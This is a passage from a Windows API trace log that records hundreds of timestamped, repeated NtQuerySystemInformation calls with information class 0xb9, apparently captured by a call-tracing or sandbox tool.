SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.687] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd60, Length=0x40, ResultLength=0x0) [0264.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd60, Length=0x40, ResultLength=0x0) [0264.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x38, ResultLength=0x0) [0264.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0264.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.744] NtQuerySystemInformation (SystemInformationClass=0xb9, 